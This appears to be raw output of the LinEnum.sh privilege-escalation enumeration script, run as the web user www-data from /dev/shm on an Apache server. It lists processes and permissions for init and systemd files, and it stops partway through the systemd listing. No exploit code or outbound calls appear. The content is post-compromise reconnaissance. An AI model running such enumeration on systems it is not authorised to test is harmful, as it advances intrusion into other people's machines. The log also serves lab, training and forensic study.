root 1 0.0 0.5 37808 5788 ? Ss 10:15 0:01 /sbin/init noprompt
root 2 0.0 0.0 0 0 ? S 10:15 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 10:15 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 10:15 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 10:15 0:00 [rcu_sched]
root 8 0.0 0.0 0 0 ? S 10:15 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 10:15 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S 10:15 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S 10:15 0:00 [kdevtmpfs]
root 12 0.0 0.0 0 0 ? S< 10:15 0:00 [netns]
root 13 0.0 0.0 0 0 ? S< 10:15 0:00 [perf]
root 14 0.0 0.0 0 0 ? S 10:15 0:00 [khungtaskd]
root 15 0.0 0.0 0 0 ? S< 10:15 0:00 [writeback]
root 16 0.0 0.0 0 0 ? SN 10:15 0:00 [ksmd]
root 17 0.0 0.0 0 0 ? SN 10:15 0:00 [khugepaged]
root 18 0.0 0.0 0 0 ? S< 10:15 0:00 [crypto]
root 19 0.0 0.0 0 0 ? S< 10:15 0:00 [kintegrityd]
root 20 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 21 0.0 0.0 0 0 ? S< 10:15 0:00 [kblockd]
root 22 0.0 0.0 0 0 ? S< 10:15 0:00 [ata_sff]
root 23 0.0 0.0 0 0 ? S< 10:15 0:00 [md]
root 24 0.0 0.0 0 0 ? S< 10:15 0:00 [devfreq_wq]
root 26 0.0 0.0 0 0 ? S 10:15 0:00 [kworker/0:1]
root 28 0.0 0.0 0 0 ? S 10:15 0:00 [kswapd0]
root 29 0.0 0.0 0 0 ? S< 10:15 0:00 [vmstat]
root 30 0.0 0.0 0 0 ? S 10:15 0:00 [fsnotify_mark]
root 31 0.0 0.0 0 0 ? S 10:15 0:00 [ecryptfs-kthrea]
root 47 0.0 0.0 0 0 ? S< 10:15 0:00 [kthrotld]
root 48 0.0 0.0 0 0 ? S< 10:15 0:00 [acpi_thermal_pm]
root 49 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 50 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 51 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 52 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 53 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 54 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 55 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 56 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 57 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 58 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 59 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 60 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 61 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 62 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 63 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 64 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 65 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 66 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 67 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 68 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 69 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 70 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 71 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 72 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 73 0.0 0.0 0 0 ? S 10:15 0:00 [scsi_eh_0]
root 74 0.0 0.0 0 0 ? S< 10:15 0:00 [scsi_tmf_0]
root 75 0.0 0.0 0 0 ? S 10:15 0:00 [scsi_eh_1]
root 76 0.0 0.0 0 0 ? S< 10:15 0:00 [scsi_tmf_1]
root 77 0.0 0.0 0 0 ? S 10:15 0:00 [kworker/u256:2]
root 83 0.0 0.0 0 0 ? S< 10:15 0:00 [ipv6_addrconf]
root 97 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 98 0.0 0.0 0 0 ? S< 10:15 0:00 [deferwq]
root 99 0.0 0.0 0 0 ? S< 10:15 0:00 [charger_manager]
root 100 0.0 0.0 0 0 ? S 10:15 0:00 [kworker/u256:4]
root 157 0.0 0.0 0 0 ? S 10:15 0:00 [scsi_eh_2]
root 158 0.0 0.0 0 0 ? S< 10:15 0:00 [scsi_tmf_2]
root 159 0.0 0.0 0 0 ? S< 10:15 0:00 [vmw_pvscsi_wq_2]
root 160 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 173 0.0 0.0 0 0 ? S< 10:15 0:00 [kpsmoused]
root 178 0.0 0.0 0 0 ? S< 10:15 0:00 [ttm_swap]
root 201 0.0 0.0 0 0 ? S 10:15 0:00 [jbd2/sda1-8]
root 202 0.0 0.0 0 0 ? S< 10:15 0:00 [ext4-rsv-conver]
root 237 0.0 0.2 28332 2852 ? Ss 10:15 0:00 /lib/systemd/systemd-journald
root 243 0.0 0.0 0 0 ? S< 10:15 0:00 [kworker/0:1H]
root 255 0.0 0.0 0 0 ? S 10:15 0:00 [kauditd]
root 275 0.0 0.2 93088 2356 ? Ssl 10:15 0:00 vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_permissions,allow_other,dev,suid
root 298 0.0 0.3 44416 3864 ? Ss 10:15 0:00 /lib/systemd/systemd-udevd
systemd+ 422 0.0 0.2 100324 2536 ? Ssl 10:15 0:00 /lib/systemd/systemd-timesyncd
message+ 556 0.0 0.3 42900 3968 ? Ss 10:15 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 569 0.0 0.2 29008 2964 ? Ss 10:15 0:00 /usr/sbin/cron -f
root 570 0.0 0.1 20100 1128 ? Ss 10:15 0:00 /lib/systemd/systemd-logind
root 573 0.0 0.6 275760 6232 ? Ssl 10:15 0:00 /usr/lib/accountsservice/accounts-daemon
syslog 574 0.0 0.3 256396 3360 ? Ssl 10:15 0:00 /usr/sbin/rsyslogd -n
root 591 0.0 0.9 111868 9648 ? Ss 10:15 0:04 /usr/bin/vmtoolsd
root 643 0.0 0.0 0 0 ? S< 10:15 0:00 [edac-poller]
root 664 0.0 0.1 15940 1776 tty1 Ss+ 10:15 0:00 /sbin/agetty --noclear tty1 linux
root 771 0.0 2.4 255896 24876 ? Ss 10:15 0:00 /usr/sbin/apache2 -k start
www-data 775 0.0 1.0 256220 10944 ? S 10:15 0:01 /usr/sbin/apache2 -k start
www-data 776 0.0 1.0 256236 10676 ? S 10:15 0:01 /usr/sbin/apache2 -k start
www-data 777 0.0 1.2 256380 12512 ? S 10:15 0:01 /usr/sbin/apache2 -k start
www-data 778 0.0 1.2 256380 12036 ? S 10:15 0:01 /usr/sbin/apache2 -k start
www-data 813 0.0 1.1 256212 11836 ? S 10:23 0:01 /usr/sbin/apache2 -k start
www-data 816 0.0 0.7 255976 7780 ? S 10:23 0:01 /usr/sbin/apache2 -k start
www-data 817 0.0 0.9 256148 9080 ? S 10:23 0:01 /usr/sbin/apache2 -k start
www-data 819 0.0 1.1 256204 11684 ? S 10:23 0:01 /usr/sbin/apache2 -k start
root 844 0.0 0.0 0 0 ? S 10:30 0:02 [kworker/0:0]
www-data 1085 0.1 1.1 256372 11904 ? S 11:21 0:01 /usr/sbin/apache2 -k start
www-data 1089 0.1 0.7 255976 7780 ? S 11:21 0:01 /usr/sbin/apache2 -k start
www-data 1211 0.0 0.0 4508 704 ? S 11:39 0:00 sh -c cd /dev/shm; bash LinEnum.sh 2>&1
www-data 1212 0.0 0.3 19028 3848 ? S 11:39 0:00 bash LinEnum.sh
www-data 1213 0.0 0.3 19072 3620 ? S 11:39 0:00 bash LinEnum.sh
www-data 1214 0.0 0.0 4384 688 ? S 11:39 0:00 tee -a
www-data 1421 0.0 0.3 19056 3012 ? S 11:39 0:00 bash LinEnum.sh
www-data 1422 0.0 0.2 34424 2788 ? R 11:39 0:00 ps aux


[00;31m[-] Process binaries and associated permissions (from above list):[00m
-rwxr-xr-x 1 root root 326224 Jan 18 2017 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root 618520 Jan 18 2017 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root 141904 Jan 18 2017 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root 453240 Jan 18 2017 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root 44104 Dec 16 2016 /sbin/agetty
lrwxrwxrwx 1 root root 20 Dec 4 2017 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root 224208 Jan 12 2017 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root 44528 Feb 9 2017 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root 164928 Nov 3 2016 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root 662496 Sep 18 2017 /usr/sbin/apache2
-rwxr-xr-x 1 root root 44472 Apr 5 2016 /usr/sbin/cron
-rwxr-xr-x 1 root root 599328 Apr 5 2016 /usr/sbin/rsyslogd


[00;31m[-] /etc/init.d/ binary permissions:[00m
total 252
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 1355 Dec 4 2017 .depend.boot
-rw-r--r-- 1 root root 471 Dec 4 2017 .depend.start
-rw-r--r-- 1 root root 667 Dec 4 2017 .depend.stop
-rw-r--r-- 1 root root 2427 Jan 19 2016 README
-rwxr-xr-x 1 root root 2210 Apr 5 2016 apache-htcacheclean
-rwxr-xr-x 1 root root 8087 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 6250 Oct 4 2016 apparmor
-rwxr-xr-x 1 root root 1275 Jan 19 2016 bootmisc.sh
-rwxr-xr-x 1 root root 3807 Jan 19 2016 checkfs.sh
-rwxr-xr-x 1 root root 1098 Jan 19 2016 checkroot-bootclean.sh
-rwxr-xr-x 1 root root 9353 Jan 19 2016 checkroot.sh
-rwxr-xr-x 1 root root 1343 Apr 4 2016 console-setup
-rwxr-xr-x 1 root root 3049 Apr 5 2016 cron
-rwxr-xr-x 1 root root 2813 Dec 1 2015 dbus
-rwxr-xr-x 1 root root 1105 Mar 15 2016 grub-common
-rwxr-xr-x 1 root root 1336 Jan 19 2016 halt
-rwxr-xr-x 1 root root 1423 Jan 19 2016 hostname.sh
-rwxr-xr-x 1 root root 3809 Mar 12 2016 hwclock.sh
-rwxr-xr-x 1 root root 2372 Apr 11 2016 irqbalance
-rwxr-xr-x 1 root root 1804 Apr 4 2016 keyboard-setup
-rwxr-xr-x 1 root root 1300 Jan 19 2016 killprocs
-rwxr-xr-x 1 root root 2087 Dec 20 2015 kmod
-rwxr-xr-x 1 root root 703 Jan 19 2016 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2301 Jan 19 2016 mountall.sh
-rwxr-xr-x 1 root root 1461 Jan 19 2016 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1564 Jan 19 2016 mountkernfs.sh
-rwxr-xr-x 1 root root 711 Jan 19 2016 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2456 Jan 19 2016 mountnfs.sh
-rwxr-xr-x 1 root root 4771 Jul 19 2015 networking
-rwxr-xr-x 1 root root 1581 Oct 15 2015 ondemand
-rwxr-xr-x 1 root root 1578 Sep 17 2016 open-vm-tools
-rwxr-xr-x 1 root root 1366 Nov 15 2015 plymouth
-rwxr-xr-x 1 root root 752 Nov 15 2015 plymouth-log
-rwxr-xr-x 1 root root 1192 Sep 5 2015 procps
-rwxr-xr-x 1 root root 6366 Jan 19 2016 rc
-rwxr-xr-x 1 root root 820 Jan 19 2016 rc.local
-rwxr-xr-x 1 root root 117 Jan 19 2016 rcS
-rwxr-xr-x 1 root root 661 Jan 19 2016 reboot
-rwxr-xr-x 1 root root 4149 Nov 23 2015 resolvconf
-rwxr-xr-x 1 root root 4355 Jul 10 2014 rsync
-rwxr-xr-x 1 root root 2796 Feb 3 2016 rsyslog
-rwxr-xr-x 1 root root 3927 Jan 19 2016 sendsigs
-rwxr-xr-x 1 root root 597 Jan 19 2016 single
-rw-r--r-- 1 root root 1087 Jan 19 2016 skeleton
-rwxr-xr-x 1 root root 6087 Apr 12 2016 udev
-rwxr-xr-x 1 root root 2049 Aug 7 2014 ufw
-rwxr-xr-x 1 root root 2737 Jan 19 2016 umountfs
-rwxr-xr-x 1 root root 2202 Jan 19 2016 umountnfs.sh
-rwxr-xr-x 1 root root 1879 Jan 19 2016 umountroot
-rwxr-xr-x 1 root root 3111 Jan 19 2016 urandom
-rwxr-xr-x 1 root root 1306 Dec 16 2016 uuidd
-rwxr-xr-x 1 root root 2757 Nov 10 2015 x11-common


[00;31m[-] /etc/init/ config file permissions:[00m
total 124
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 3735 Oct 4 2016 apparmor.conf
-rw-r--r-- 1 root root 250 Apr 4 2016 console-font.conf
-rw-r--r-- 1 root root 509 Apr 4 2016 console-setup.conf
-rw-r--r-- 1 root root 297 Apr 5 2016 cron.conf
-rw-r--r-- 1 root root 482 Sep 1 2015 dbus.conf
-rw-r--r-- 1 root root 1247 Jun 1 2015 friendly-recovery.conf
-rw-r--r-- 1 root root 284 Jul 23 2013 hostname.conf
-rw-r--r-- 1 root root 300 May 21 2014 hostname.sh.conf
-rw-r--r-- 1 root root 561 Mar 14 2016 hwclock-save.conf
-rw-r--r-- 1 root root 674 Mar 14 2016 hwclock.conf
-rw-r--r-- 1 root root 109 Mar 14 2016 hwclock.sh.conf
-rw-r--r-- 1 root root 597 Apr 11 2016 irqbalance.conf
-rw-r--r-- 1 root root 689 Aug 20 2015 kmod.conf
-rw-r--r-- 1 root root 530 Jun 2 2015 network-interface-container.conf
-rw-r--r-- 1 root root 1756 Jun 2 2015 network-interface-security.conf
-rw-r--r-- 1 root root 933 Jun 2 2015 network-interface.conf
-rw-r--r-- 1 root root 2493 Jun 2 2015 networking.conf
-rw-r--r-- 1 root root 568 Feb 1 2016 passwd.conf
-rw-r--r-- 1 root root 363 Jun 5 2014 procps-instance.conf
-rw-r--r-- 1 root root 119 Jun 5 2014 procps.conf
-rw-r--r-- 1 root root 457 Jun 3 2015 resolvconf.conf
-rw-r--r-- 1 root root 426 Dec 2 2015 rsyslog.conf
-rw-r--r-- 1 root root 230 Apr 4 2016 setvtrgb.conf
-rw-r--r-- 1 root root 337 Apr 12 2016 udev.conf
-rw-r--r-- 1 root root 360 Apr 12 2016 udevmonitor.conf
-rw-r--r-- 1 root root 352 Apr 12 2016 udevtrigger.conf
-rw-r--r-- 1 root root 473 Aug 7 2014 ufw.conf
-rw-r--r-- 1 root root 683 Feb 24 2015 ureadahead-other.conf
-rw-r--r-- 1 root root 889 Feb 24 2015 ureadahead.conf


[00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 8.2M
drwxr-xr-x 26 root root 12K Dec 4 2017 system
drwxr-xr-x 2 root root 4.0K Dec 4 2017 system-sleep
drwxr-xr-x 2 root root 4.0K Dec 4 2017 system-preset
drwxr-xr-x 2 root root 4.0K Dec 4 2017 system-generators
drwxr-xr-x 2 root root 4.0K Dec 4 2017 network
-rwxr-xr-x 1 root root 443K Jan 18 2017 systemd-udevd
-rwxr-xr-x 1 root root 15K Jan 18 2017 systemd-ac-power
-rwxr-xr-x 1 root root 47K Jan 18 2017 systemd-binfmt
-rwxr-xr-x 1 root root 103K Jan 18 2017 systemd-bootchart
-rwxr-xr-x 1 root root 91K Jan 18 2017 systemd-cryptsetup
-rwxr-xr-x 1 root root 75K Jan 18 2017 systemd-fsckd
-rwxr-xr-x 1 root root 276K Jan 18 2017 systemd-initctl
-rwxr-xr-x 1 root root 824K Jan 18 2017 systemd-networkd
-rwxr-xr-x 1 root root 35K Jan 18 2017 systemd-quotacheck
-rwxr-xr-x 1 root root 657K Jan 18 2017 systemd-resolved
-rwxr-xr-x 1 root root 35K Jan 18 2017 systemd-user-sessions
-rwxr-xr-x 1 root root 55K Jan 18 2017 systemd-activate
-rwxr-xr-x 1 root root 91K Jan 18 2017 systemd-backlight
-rwxr-xr-x 1 root root 352K Jan 18 2017 systemd-bus-proxyd
-rwxr-xr-x 1 root root 31K Jan 18 2017 systemd-hibernate-resume
-rwxr-xr-x 1 root root 340K Jan 18 2017 systemd-localed
-rwxr-xr-x 1 root root 605K Jan 18 2017 systemd-logind
-rwxr-xr-x 1 root root 123K Jan 18 2017 systemd-networkd-wait-online
-rwxr-xr-x 1 root root 35K Jan 18 2017 systemd-random-seed
-rwxr-xr-x 1 root root 31K Jan 18 2017 systemd-reply-password
-rwxr-xr-x 1 root root 91K Jan 18 2017 systemd-rfkill
-rwxr-xr-x 1 root root 143K Jan 18 2017 systemd-shutdown
-rwxr-xr-x 1 root root 71K Jan 18 2017 systemd-sleep
-rwxr-xr-x 1 root root 51K Jan 18 2017 systemd-sysctl
-rwxr-xr-x 1 root root 333K Jan 18 2017 systemd-timedated
-rwxr-xr-x 1 root root 139K Jan 18 2017 systemd-timesyncd
-rwxr-xr-x 1 root root 276K Jan 18 2017 systemd-update-utmp
-rwxr-xr-x 1 root root 1.6M Jan 18 2017 systemd
-rwxr-xr-x 1 root root 268K Jan 18 2017 systemd-cgroups-agent
-rwxr-xr-x 1 root root 301K Jan 18 2017 systemd-fsck
-rwxr-xr-x 1 root root 332K Jan 18 2017 systemd-hostnamed
-rwxr-xr-x 1 root root 319K Jan 18 2017 systemd-journald
-rwxr-xr-x 1 root root 51K Jan 18 2017 systemd-modules-load
-rwxr-xr-x 1 root root 51K Jan 18 2017 systemd-remount-fs
-rwxr-xr-x 1 root root 91K Jan 18 2017 systemd-socket-proxyd
-rwxr-xr-x 1 root root 1.3K Jan 12 2017 systemd-sysv-install
drwxr-xr-x 2 root root 4.0K Apr 12 2016 system-shutdown

/lib/systemd/system:
total 792K
drwxr-xr-x 2 root root 4.0K Dec 4 2017 apache2.service.d
drwxr-xr-x 2 root root 4.0K Dec 4 2017 halt.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 timers.target.wants
lrwxrwxrwx 1 root root 21 Dec 4 2017 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root 27 Dec 4 2017 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 x11-common.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 systemd-timesyncd.service.d
lrwxrwxrwx 1 root root 9 Dec 4 2017 sendsigs.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 sigpwr.target.wants
lrwxrwxrwx 1 root root 9 Dec 4 2017 single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 stop-bootlogd.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 resolvconf.service.wants
lrwxrwxrwx 1 root root 9 Dec 4 2017 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root 15 Dec 4 2017 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root 13 Dec 4 2017 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root 17 Dec 4 2017 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Dec 4 2017 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Dec 4 2017 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root 16 Dec 4 2017 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root 13 Dec 4 2017 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root 22 Dec 4 2017 procps.service -> systemd-sysctl.service
drwxr-xr-x 2 root root 4.0K Dec 4 2017 rc-local.service.d
lrwxrwxrwx 1 root root 16 Dec 4 2017 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 rc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 rcS.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 reboot.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 graphical.target.wants
lrwxrwxrwx 1 root root 9 Dec 4 2017 halt.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 hostname.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root 28 Dec 4 2017 kmod.service -> systemd-modules-load.service
drwxr-xr-x 2 root root 4.0K Dec 4 2017 local-fs.target.wants
lrwxrwxrwx 1 root root 28 Dec 4 2017 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 motd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountall.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 16 Dec 4 2017 default.target -> graphical.target
lrwxrwxrwx 1 root root 9 Dec 4 2017 fuse.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 getty.target.wants
lrwxrwxrwx 1 root root 14 Dec 4 2017 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root 13 Dec 4 2017 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root 25 Dec 4 2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root 23 Dec 4 2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 Dec 4 2017 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 24 Dec 4 2017 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root 24 Dec 4 2017 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root 25 Dec 4 2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
drwxr-xr-x 2 root root 4.0K Feb 15 2017 busnames.target.wants
-rw-r--r-- 1 root root 460 Feb 9 2017 run-vmblock-fuse.mount
-rw-r--r-- 1 root root 269 Jan 31 2017 setvtrgb.service
-rw-r--r-- 1 root root 770 Jan 18 2017 console-getty.service
-rw-r--r-- 1 root root 742 Jan 18 2017 console-shell.service
-rw-r--r-- 1 root root 791 Jan 18 2017 container-getty@.service
-rw-r--r-- 1 root root 1010 Jan 18 2017 debug-shell.service
-rw-r--r-- 1 root root 1009 Jan 18 2017 emergency.service
-rw-r--r-- 1 root root 1.5K Jan 18 2017 getty@.service
-rw-r--r-- 1 root root 630 Jan 18 2017 initrd-cleanup.service
-rw-r--r-- 1 root root 790 Jan 18 2017 initrd-parse-etc.service
-rw-r--r-- 1 root root 640 Jan 18 2017 initrd-switch-root.service
-rw-r--r-- 1 root root 664 Jan 18 2017 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root 677 Jan 18 2017 kmod-static-nodes.service
-rw-r--r-- 1 root root 473 Jan 18 2017 mail-transport-agent.target
-rw-r--r-- 1 root root 568 Jan 18 2017 quotaon.service
-rw-r--r-- 1 root root 612 Jan 18 2017 rc-local.service
-rw-r--r-- 1 root root 978 Jan 18 2017 rescue.service
-rw-r--r-- 1 root root 1.1K Jan 18 2017 serial-getty@.service
-rw-r--r-- 1 root root 653 Jan 18 2017 systemd-ask-password-console.service
-rw-r--r-- 1 root root 681 Jan 18 2017 systemd-ask-password-wall.service
-rw-r--r-- 1 root root 724 Jan 18 2017 systemd-backlight@.service
-rw-r--r-- 1 root root 959 Jan 18 2017 systemd-binfmt.service
-rw-r--r-- 1 root root 650 Jan 18 2017 systemd-bootchart.service
-rw-r--r-- 1 root root 1.0K Jan 18 2017 systemd-bus-proxyd.service
-rw-r--r-- 1 root root 497 Jan 18 2017 systemd-exit.service
-rw-r--r-- 1 root root 674 Jan 18 2017 systemd-fsck-root.service
-rw-r--r-- 1 root root 648 Jan 18 2017 systemd-fsck@.service
-rw-r--r-- 1 root root 551 Jan 18 2017 systemd-fsckd.service
-rw-r--r-- 1 root root 544 Jan 18 2017 systemd-halt.service
-rw-r--r-- 1 root root 631 Jan 18 2017 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root 501 Jan 18 2017 systemd-hibernate.service
-rw-r--r-- 1 root root 710 Jan 18 2017 systemd-hostnamed.service
-rw-r--r-- 1 root root 778 Jan 18 2017 systemd-hwdb-update.service
-rw-r--r-- 1 root root 519 Jan 18 2017 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root 480 Jan 18 2017 systemd-initctl.service
-rw-r--r-- 1 root root 731 Jan 18 2017 systemd-journal-flush.service
-rw-r--r-- 1 root root 1.3K Jan 18 2017 systemd-journald.service
-rw-r--r-- 1 root root 557 Jan 18 2017 systemd-kexec.service
-rw-r--r-- 1 root root 691 Jan 18 2017 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Jan 18 2017 systemd-logind.service
-rw-r--r-- 1 root root 693 Jan 18 2017 systemd-machine-id-commit.service
-rw-r--r-- 1 root root 967 Jan 18 2017 systemd-modules-load.service
-rw-r--r-- 1 root root 685 Jan 18 2017 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 1.3K Jan 18 2017 systemd-networkd.service
-rw-r--r-- 1 root root 553 Jan 18 2017 systemd-poweroff.service
-rw-r--r-- 1 root root 614 Jan 18 2017 systemd-quotacheck.service
-rw-r--r-- 1 root root 717 Jan 18 2017 systemd-random-seed.service
-rw-r--r-- 1 root root 548 Jan 18 2017 systemd-reboot.service
-rw-r--r-- 1 root root 757 Jan 18 2017 systemd-remount-fs.service
-rw-r--r-- 1 root root 907 Jan 18 2017 systemd-resolved.service
-rw-r--r-- 1 root root 696 Jan 18 2017 systemd-rfkill.service
-rw-r--r-- 1 root root 497 Jan 18 2017 systemd-suspend.service
-rw-r--r-- 1 root root 649 Jan 18 2017 systemd-sysctl.service
-rw-r--r-- 1 root root 655 Jan 18 2017 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jan 18 2017 systemd-timesyncd.service
-rw-r--r-- 1 root root 598 Jan 18 2017 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root 703 Jan 18 2017 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root 683 Jan 18 2017 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 823 Jan 18 2017 systemd-udev-settle.service
-rw-r--r-- 1 root root 743 Jan 18 2017 systemd-udev-trigger.service
-rw-r--r-- 1 root root 825 Jan 18 2017 systemd-udevd.service
-rw-r--r-- 1 root root 757 Jan 18 2017 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root 754 Jan 18 2017 systemd-update-utmp.service
-rw-r--r-- 1 root root 573 Jan 18 2017 systemd-user-sessions.service
-rw-r--r-- 1 root root 528 Jan 18 2017 user@.service
-rw-r--r-- 1 root root 403 Jan 18 2017 -.slice
-rw-r--r-- 1 root root 879 Jan 18 2017 basic.target
-rw-r--r-- 1 root root 379 Jan 18 2017 bluetooth.target
-rw-r--r-- 1 root root 358 Jan 18 2017 busnames.target
-rw-r--r-- 1 root root 394 Jan 18 2017 cryptsetup-pre.target
-rw-r--r-- 1 root root 366 Jan 18 2017 cryptsetup.target
-rw-r--r-- 1 root root 670 Jan 18 2017 dev-hugepages.mount
